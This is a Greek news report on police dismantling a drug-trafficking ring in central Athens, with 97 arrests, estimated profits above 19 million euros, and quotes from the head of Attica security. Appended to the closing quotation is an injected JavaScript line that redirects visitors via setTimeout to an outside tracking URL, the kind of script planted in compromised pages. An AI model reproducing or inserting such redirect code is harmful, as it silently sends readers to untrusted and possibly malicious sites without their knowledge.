Εξαρθρώθηκε κύκλωμα ναρκωτικών- Συνελήφθησαν 97 άτομα

0
7

 

Καίριο πλήγμα στα κυκλώματα των ναρκωτικών επέφερε η Ελληνική Αστυνομία με την εξάρθρωση πολυμελούς εγκληματικής οργάνωσης που εμπορευόταν και διακινούσε μεγάλες ποσότητες στην ευρύτερη περιοχή του κέντρου της Αθήνας.

Αυτή θεωρείται μία από τις σημαντικότερες και δυσκολότερες υποθέσεις που έχει αντιμετωπίσει η ΕΛ.ΑΣ στον τομέα των ναρκωτικών. Συνελήφθησαν 97 άτομα, ενώ, όπως εκτιμά η αστυνομία, το οικονομικό όφελος της οργάνωσης ξεπερνά τα 19 εκατομμύρια ευρώ.

Κατά την παρουσίαση της υπόθεσης στον Τύπο, ο διοικητής της Διεύθυνσης Ασφάλειας Αττικής, Χρήστος Παπαζαφείρης, ανέφερε πως μετά την εξάρθρωση του συγκεκριμένου κυκλώματος εκτιμάται ότι η μείωση της διακίνησης των ναρκωτικών στην ευρύτερη περιοχή του κέντρου της Αθήνας θα φτάσει έως και το 40%.

«Αποδομήσαμε πλήρως το εγκληματικό δίκτυο, το οποίο κυριαρχούσε τα τελευταία χρόνια στην εμπορία και διακίνηση ναρκωτικών, στην ευρύτερη περιοχή του κέντρου της Αθήνας. Πλατεία Αμερικής, Δροσοπούλου, Προπύλαια, Νομική Σχολή – Πνευματικό Κέντρο Δήμου Αθηναίων, Πλατεία Κάνιγγος, Πλατεία Βικτωρίας και περιμετρικά του κέντρου της Αθήνας ήταν οι κυριότεροι χώροι δραστηριοποίησής του», τόνισε ο κ. Παπαζαφείρης,και συμπλήρωσε πως «το εγκληματικό δίκτυο είχε ένα ιδιαίτερο τρόπο δόμησης, οργάνωσης και δραστηριοποίησης. Ήταν ένα πολύπλευρο σχήμα, με κεντρικό σχεδιασμό και οργάνωση, δομημένο σε επτά διαφορετικά επίπεδα, που λειτουργούσαν αυτοτελώς ή συνδυαστικά και κάλυπταν όλο το εύρος της εγκληματικής δραστηριοποίησης στον τομέα των ναρκωτικών. Από την πρωτογενή παραγωγή, την εισαγωγή και την αποθήκευση μέχρι τη διακίνηση και εμπορία σημαντικών ποσοτήτων ακατέργαστης και υδροπονικής κάνναβης καθώς και ηρωίνης και κοκαΐνης». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here